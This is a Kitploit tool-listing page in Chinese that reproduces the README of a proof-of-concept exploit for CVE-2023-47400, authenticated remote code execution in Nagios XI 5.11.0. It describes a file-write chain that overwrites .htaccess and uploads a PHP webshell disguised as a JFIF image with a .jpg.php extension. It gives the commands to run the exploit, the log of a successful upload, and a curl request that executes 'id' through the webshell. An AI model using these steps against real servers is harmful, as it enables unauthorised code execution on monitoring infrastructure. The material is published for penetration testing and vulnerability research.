Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-47400 — CVE-2023-47400 的概念验证 | Kitploit
工具/GitHubGitHub/lucasvanhaaren/cve-2023-47400
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHublucasvanhaaren/cve-2023-47400

CVE-2023-47400

CVE-2023-47400 的概念验证

查看仓库
2132年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-47400

CVE-2023-47400 的概念验证

通过任意文件写入在 Nagios XI 5.11.0 上实现已认证的 PHP 远程代码执行


[!Note] 此 PoC 基于 NCC 集团发布的技术公告 https://research.nccgroup.com/2023/12/13/technical-advisory-multiple-vulnerabilities-in-nagios-xi/

此 PoC 遵循以下过程:

  • 上传一个名为 placeholder.jpg 的有效图像(仅包含 JFIF 魔数头部,无内容)
  • 使用自定义包含的 重命名 功能将图像重命名为 .htaccess(这会覆盖现有的 .htaccess 文件)
  • 使用自定义包含的 删除 功能删除 .htaccess 文件
  • 上传 PHP 有效载荷(通过 JFIF 魔数字节头部和 .jpg.php 双扩展名伪装成图像签名)

利用此漏洞可以在 nagiosXI 主机上实现远程代码执行,绕过文件上传过滤(通过文件签名和文件扩展名过滤)以及 PHP 执行阻止(通过 .htaccess)。

[!Warning] 此漏洞利用会擦除主机上存在的 <NAGIOS_WEB_ROOT>/includes/components/custom-includes/images/.htaccess 文件,以允许 PHP 代码执行!

使用方法

  • 设置项目:
root@kitploit:~
# 创建虚拟环境以隔离依赖
python3 -m venv .venv
source .venv/bin/activate
# 运行漏洞利用前执行 pip 安装
pip install -r requirements.txt
  • 自定义要放置在图片上传文件夹中的 PHP 有效载荷

  • 运行漏洞利用脚本:

root@kitploit:~
python exploit.py
# 漏洞利用会生成一个 webshell 并以 UUID 作为文件名上传
[...]
INFO:cve_2023_47400:Successfuly uploaded payload at
INFO:cve_2023_47400:Usage :https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php
INFO:cve_2023_47400:Exploit completed successfuly
  • 与上传的有效载荷交互:
root@kitploit:~
$ curl -k 'https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php?cmd=id' --output -
JFIF
uid=33(www-data) gid=33(www-data) groups=33(www-data),121(Debian-snmp),1001(nagios),1002(nagcmd)
下载工具